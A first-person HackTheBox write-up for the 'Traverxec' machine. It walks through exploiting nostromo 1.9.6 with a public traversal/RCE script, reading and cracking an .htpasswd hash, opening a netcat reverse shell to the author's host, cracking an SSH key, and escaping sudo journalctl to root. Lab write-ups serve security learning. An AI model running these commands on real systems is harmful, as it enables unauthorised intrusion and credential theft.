Traverxec is rated as an easy box on HackTheBox.
As with all HackTheBox machines I started with an nmap scan which identified port 80 was open and running nostromo 1.9.6, a simple HTTP server also called nhttpd.
While searching for some information on nostromo, pretty much the first search result was about a known vulnerability. I quickly found an exploit for it here. The exploit is basically a directory traversal vulnerability with remote command execution, hence the box name Traverxec.
The exploit makes a POST request for /bin/sh, which is then used to execute arbitrary commands.
Using the above exploit script I poked around the box and found an .htpasswd file in the nostromo server directory:
./exploit.sh 10.10.10.165 80 cat /var/nostromo/conf/.htpasswd
Copying the hash from that file I cracked it with hashcat on my host machine:
hashcat --opencl-platforms=1 --username -m 500 -a 0 -w 3 hash /usr/share/wordlists/rockyou.txt
I now had the first pair of credentials:
Hoping those were the credentials to login via SSH I tried doing that, but no. Apparently they were for something else so I went back to poking in the box.
At this point it started to get a little cumbersome to use the above exploit script for every command, so I used it to make a reverse Netcat shell to my machine:
./exploit.sh 10.10.10.165 80 nc -e /bin/sh 10.10.14.157 9001
For the next part I had to look closely at the nhttpd file where I found the .htpasswd in the beginning. This file was configured to serve the home directory of david as well as the directory public_www. While I was able to visit http://10.10.10.165/~david there was nothing interesting there, and the permissions of /home/david did not allow for reading files. Something was amiss though, as I had execute rights on that folder, so I could cd into it but not run ls on it. After looking at the usual files (.bashrc etc) in that folder, I tried going to /home/david/public_www. This worked, and I was able to use ls here and find a backup file. This backup file contained a private SSH keyfile which I transferred to my host machine and cracked with john.
Finally I had a pair of credentials to SSH into the machine and grab the user.txt.
In the home dir I found a folder called /bin which contained this file: ./server-status.sh
Running it showed some information of the processes running on the box, and looking at the last line of the script revealed that the last command was run with sudo.
Looking up the command (journalctl) on GTFObin revealed how one could escape the current environment and get a shell with !/bin/sh. This did not work from within the script, but running the last part of the script manually from terminal worked (omitting the pipe into cat ¦ /usr/bin/cat) and I had a root shell due to the use of password-less sudo for the journalctl command.
With this I could read root.txt and the box was pwned.